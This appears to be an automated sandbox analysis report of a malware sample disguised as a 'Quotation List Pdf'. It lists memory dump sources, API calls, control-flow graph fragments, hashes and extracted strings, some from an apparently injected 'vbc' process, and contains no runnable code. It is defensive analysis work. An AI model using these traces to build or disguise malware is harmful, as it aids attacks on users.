                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: 2158b8275b8e927ea860eb8b48a04596ff7d9b9df4afa64fc7c7d762c6f39301
                                                      • Instruction ID: 58ad98d86ae1b04a1789e274455ae8367173143e7b7c88d7cb98e6d28a5b3859
                                                      • Opcode Fuzzy Hash: 2158b8275b8e927ea860eb8b48a04596ff7d9b9df4afa64fc7c7d762c6f39301
                                                      • Instruction Fuzzy Hash: 22112B32618B41C2EB219F15E440269FBE5FF88B94F984234EE8D07B99DF3DD9518B14
                                                      APIs
                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF76843DD43,?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843E51B
                                                      • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF76843DD43,?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843E558
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: _stricmpstrtoull
                                                      • String ID: HeapVerify
                                                      • API String ID: 4031153986-2674988305
                                                      • Opcode ID: 7c2d8afe691a5ee2b53f1849f6005c7252510a015ecc9786c3c7096a8c5378b9
                                                      • Instruction ID: 75ff158b121d0a39937225274b3e05cf8f60cee6f9462c0fc136fbb91aa58058
                                                      • Opcode Fuzzy Hash: 7c2d8afe691a5ee2b53f1849f6005c7252510a015ecc9786c3c7096a8c5378b9
                                                      • Instruction Fuzzy Hash: 06015271A09A42C7EB50AF52F9C0069F7A1FF447C0F999035DA6D03B5AEE3CE8858618
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF768455BEF,?,?,?,00007FF7684633BB), ref: 00007FF768455ABD
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF768455BEF,?,?,?,00007FF7684633BB), ref: 00007FF768455B12
                                                      • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF768455BEF,?,?,?,00007FF7684633BB), ref: 00007FF768455B2F
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF768455BEF,?,?,?,00007FF7684633BB), ref: 00007FF768455B4C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: a1fa865a0e94e1f8772bdde457da13c0df39fa8a2aff1e55c8e78e7da091c82e
                                                      • Instruction ID: 8544405f87d16f1bf589b00544729066aa82d1aff854a4c1158f6c6b8e8b2c26
                                                      • Opcode Fuzzy Hash: a1fa865a0e94e1f8772bdde457da13c0df39fa8a2aff1e55c8e78e7da091c82e
                                                      • Instruction Fuzzy Hash: 9121D821A08A47C2EA00AF11A8502B9E795EF19BE4FC80735DD6C436DACF3CE149C358

                                                      Execution Graph

                                                      Execution Coverage:1.4%
                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                      Signature Coverage:8.2%
                                                      Total number of Nodes:134
                                                      Total number of Limit Nodes:9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 63 417703-41771f 64 417727-41772c 63->64 65 417722 call 42df13 63->65 66 417732-417740 call 42e433 64->66 67 41772e-417731 64->67 65->64 70 417750-417761 call 42c8d3 66->70 71 417742-41774d call 42e6d3 66->71 76 417763-417777 LdrLoadDll 70->76 77 41777a-41777d 70->77 71->70 76->77
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417775
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                      • Instruction ID: eeced8f301d516fecf3b6cf9e82bf5757c444c6e73340693661520b8d617bc8d
                                                      • Opcode Fuzzy Hash: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                      • Instruction Fuzzy Hash: 680175B5E4010DA7DF10EBE5DC42FDEB3789B54304F4041A6E91897280F634EB44CB95

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 88 42b323-42b35c call 4047c3 call 42c3d3 NtClose
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction ID: 3039bc074491d37156bff015f972cd928b69bcf450b4b173c57b52314d4002d8
                                                      • Opcode Fuzzy Hash: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction Fuzzy Hash: ABE04F316402147BD210EA5ADC81F9B776CDFC5710F008429FA0CA7282C674791186F4

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 105 58535c0-58535cc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8ca641dea9c4bab24c55c89dae97da9e9583b88ecd4e086151b995092345a3d4
                                                      • Instruction ID: 296092bb5e0b7f9ae70ce2bf94881c5421348568355b2e76dc73f5865717075c
                                                      • Opcode Fuzzy Hash: 8ca641dea9c4bab24c55c89dae97da9e9583b88ecd4e086151b995092345a3d4
                                                      • Instruction Fuzzy Hash: 6D90027670550406D20071584554706105587D0202FA5C411A9468568D87958E5569A3

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 104 5852df0-5852dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cb5ef35cb035018d4045fc9ac7ebf01ea64dfcb250da9547d1c8fb762829792f
                                                      • Instruction ID: 01c481fcdcc7fdc0ff0859b980a9b14ac360439acd7f3fe33c31ca6b7d3ace48
                                                      • Opcode Fuzzy Hash: cb5ef35cb035018d4045fc9ac7ebf01ea64dfcb250da9547d1c8fb762829792f
                                                      • Instruction Fuzzy Hash: 7B90027630140417D21171584544707005987D0242FD5C412A9468558D96568E56A522

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 103 5852c70-5852c7c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 433c5b3d1166623694de07e7ecf1da0d7dd32fcb60959849be39146f8541bf45
                                                      • Instruction ID: f130d2c0f1f583d582c23cf160877ee5443d331e631e582727c3add718c2b58a
                                                      • Opcode Fuzzy Hash: 433c5b3d1166623694de07e7ecf1da0d7dd32fcb60959849be39146f8541bf45
                                                      • Instruction Fuzzy Hash: 6390027630148806D2107158844474A005587D0302F99C411AD468658D86958D957522

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 5852b60-5852b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 04525b09ff79824a5f9fdac77b8a3be4a75e03fa2b07e31d5548b5dc6f2c9ac1
                                                      • Instruction ID: 809dd30d38314984e6f810917f08d56ccf4925f07abf31e6cc11ca92e0f3b16c
                                                      • Opcode Fuzzy Hash: 04525b09ff79824a5f9fdac77b8a3be4a75e03fa2b07e31d5548b5dc6f2c9ac1
                                                      • Instruction Fuzzy Hash: 7A9002A630240007420571584454716405A87E0202B95C021EA058590DC5258D956526

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 0-340756553
                                                      • Opcode ID: f688de1afc66353fe17ba0579636bbb520c6b11486c0878a37f8ecaa991bc9d2
                                                      • Instruction ID: f912008a9ce0e7864203705e57b24ec344802695dda15a43cade87ec3fcbda66
                                                      • Opcode Fuzzy Hash: f688de1afc66353fe17ba0579636bbb520c6b11486c0878a37f8ecaa991bc9d2
                                                      • Instruction Fuzzy Hash: EA31DB32D0428579DB119F609C02FEF7FB4EF42B18F140199E5906F382E3B986878795

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 28 413d8c-413da3 29 413dac-413e01 call 42dcc3 call 417703 call 404733 call 424583 28->29 30 413da7 call 42d2b3 28->30 39 413e23-413e28 29->39 40 413e03-413e14 PostThreadMessageW 29->40 30->29 40->39 41 413e16-413e20 40->41 41->39
                                                      APIs
                                                      • PostThreadMessageW.USER32(y870G2JOQ,00000111,00000000,00000000), ref: 00413E10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 1836367815-340756553
                                                      • Opcode ID: 7a1c1d2bbb7b84827de7cb334df44a25798dd0402d051256b07fe7618c83d6b6
                                                      • Instruction ID: 909a04ca464126aaf77ad8d1e22a3f7f739707e813f057d993a96ea3a725619a
                                                      • Opcode Fuzzy Hash: 7a1c1d2bbb7b84827de7cb334df44a25798dd0402d051256b07fe7618c83d6b6
                                                      • Instruction Fuzzy Hash: 0C11E531D4021876EB10DB91DC42FDE7B7C9F81B14F00805AFA107B281D6B857458BE9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 42 413d93-413da3 43 413dac-413e01 call 42dcc3 call 417703 call 404733 call 424583 42->43 44 413da7 call 42d2b3 42->44 53 413e23-413e28 43->53 54 413e03-413e14 PostThreadMessageW 43->54 44->43 54->53 55 413e16-413e20 54->55 55->53
                                                      APIs
                                                      • PostThreadMessageW.USER32(y870G2JOQ,00000111,00000000,00000000), ref: 00413E10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 1836367815-340756553
                                                      • Opcode ID: 855fd636073743eba5a1a7b23e7a17215b259c7ae586414cdfbe5350c89fd9f7
                                                      • Instruction ID: 3058a54dbd29a06e027b2ce5d794ffe46b737ef8e11a4404d8236d5dbdc6aae9
                                                      • Opcode Fuzzy Hash: 855fd636073743eba5a1a7b23e7a17215b259c7ae586414cdfbe5350c89fd9f7
                                                      • Instruction Fuzzy Hash: 0E01C431E4031876EB21AA919C02FDF7B7C9F41B14F048059FA147B2C1D6F896458BEA

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 78 42b633-42b674 call 4047c3 call 42c3d3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041DF4B,?,?,00000000,?,0041DF4B,?,?,?), ref: 0042B66F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction ID: 4903e161e240f14165b1b6672f053255631e24b787b26f573fe19e33aaf648ec
                                                      • Opcode Fuzzy Hash: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction Fuzzy Hash: 26E06D716442087BE610EE59DC41FAB33ADEFC5710F004419FA08A7242C674B9108BB8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 83 42b683-42b6c4 call 4047c3 call 42c3d3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,000038B9,00000007,00000000,00000004,00000000,00416FDD,000000F4,?,?,?,?,?), ref: 0042B6BF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 0112f9322e6f1835dd35a6fc29f2826ad6aaf91cfcf238a7f57362f68a7b31ae
                                                      • Instruction ID: 1c83892d60417b5e4ab37d158829327125a5608814a669f9e15954a2b43496e2
                                                      • Opcode Fuzzy Hash: 0112f9322e6f1835dd35a6fc29f2826ad6aaf91cfcf238a7f57362f68a7b31ae
                                                      • Instruction Fuzzy Hash: F0E06D75644208BBD614EE59DC41EAB33ACEFC5710F00441DFE08A7282C670B9108BB9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 93 42b6d3-42b70c call 4047c3 call 42c3d3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,07E5FE20,?,?,07E5FE20), ref: 0042B707
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 48bb91168e281495610eac6062f1ad4e0f41f16c92e83059ba1397e7a24a77a3
                                                      • Instruction ID: 161a1daadeaf9ad9d9ead48a002dc238042592eab69b761733b69c166c64c94b
                                                      • Opcode Fuzzy Hash: 48bb91168e281495610eac6062f1ad4e0f41f16c92e83059ba1397e7a24a77a3
                                                      • Instruction Fuzzy Hash: FDE04F356402147BD210EB5ADC41F9B77ADDBC6B14F008429FA09A7181C7B1B9148BF5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 98 5852c0a-5852c0f 99 5852c11-5852c18 98->99 100 5852c1f-5852c26 LdrInitializeThunk 98->100
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 76c612704cf1fcb429e04178e5f764c1b16e29e4d7952c86d68961fc0aff39c0
                                                      • Instruction ID: d4be459742da0d7f4aa513db123c9721c55cef6857fe7b4c92452919b15b1a26
                                                      • Opcode Fuzzy Hash: 76c612704cf1fcb429e04178e5f764c1b16e29e4d7952c86d68961fc0aff39c0
                                                      • Instruction Fuzzy Hash: EDB02B729014C0C9DB00E3200608B17390077C0301F15C021DB034241F0738C8C0E172
                                                      Strings
                                                      • Critical section address, xrefs: 05885425, 058854BC, 05885534
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058854CE
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 05885543
                                                      • double initialized or corrupted critical section, xrefs: 05885508
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0588540A, 05885496, 05885519
                                                      • Address of the debug info found in the active list., xrefs: 058854AE, 058854FA
                                                      • Critical section debug info address, xrefs: 0588541F, 0588552E
                                                      • undeleted critical section in freed memory, xrefs: 0588542B
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058854E2
                                                      • 8, xrefs: 058852E3
                                                      • Thread identifier, xrefs: 0588553A
                                                      • Invalid debug info address of this critical section, xrefs: 058854B6
                                                      • corrupted critical section, xrefs: 058854C2
                                                      • Critical section address., xrefs: 05885502
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: a621775d8d396b066552bc2c3b46cb9efb09f8bc89bde0871ba7af18f5379faf
                                                      • Instruction ID: d657814d57b92fde1dc23508c98696688271d3aece77929c79f6c64dc41fe005
                                                      • Opcode Fuzzy Hash: a621775d8d396b066552bc2c3b46cb9efb09f8bc89bde0871ba7af18f5379faf
                                                      • Instruction Fuzzy Hash: 5E8167B1A41348AFDB20DF99C845BAEBBB6FB08B14F104159FA05F7280D3B1AD45EB51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                      • API String ID: 0-3063724069
                                                      • Opcode ID: 3195e0169bd19b96473f97c834d7a208434f720798352de6fd903ec1cf5d5166
                                                      • Instruction ID: ed6d2722ccf9140156398a8b58bebd7f354d333d9349eb2b66d3f1213a9a2394
                                                      • Opcode Fuzzy Hash: 3195e0169bd19b96473f97c834d7a208434f720798352de6fd903ec1cf5d5166
                                                      • Instruction Fuzzy Hash: 2AD1FFB390D315ABE721DA68C845BABB7E8AFC4714F044A29FE84E7250E774CD448793
                                                      Strings
                                                      • @, xrefs: 0580D2AF
                                                      • @, xrefs: 0580D313
                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0580D146
                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0580D0CF
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0580D2C3
                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0580D196
                                                      • @, xrefs: 0580D0FD
                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0580D262
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                      Similarity
                                                      • API ID:
                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                      Strings
                                                      • apphelp.dll, xrefs: 05806496
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05869A11, 05869A3A
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05869A2A
                                                      • LdrpInitShimEngine, xrefs: 058699F4, 05869A07, 05869A30
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 058699ED
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05869A01
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • Loading import redirection DLL: '%wZ', xrefs: 05888170
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 058881E5
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0584C6C3
                                                      • LdrpInitializeProcess, xrefs: 0584C6C4
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 05888181, 058881F5
                                                      • LdrpInitializeImportRedirection, xrefs: 05888177, 058881EB
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      Strings
                                                      • SXS: %s() passed the empty activation context, xrefs: 05882165
                                                      • RtlGetAssemblyStorageRoot, xrefs: 05882160, 0588219A, 058821BA
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05882178
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05882180
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 058821BF
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0588219F
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 058802E7
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 058802BD
                                                      • RTL: Re-Waiting, xrefs: 0588031E
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      Strings
                                                      • Kernel-MUI-Number-Allowed, xrefs: 05835247
                                                      • Kernel-MUI-Language-SKU, xrefs: 0583542B
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 05835352
                                                      • WindowsExcludedProcs, xrefs: 0583522A
                                                      • Kernel-MUI-Language-Allowed, xrefs: 0583527B
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                      Similarity
                                                      • API ID:
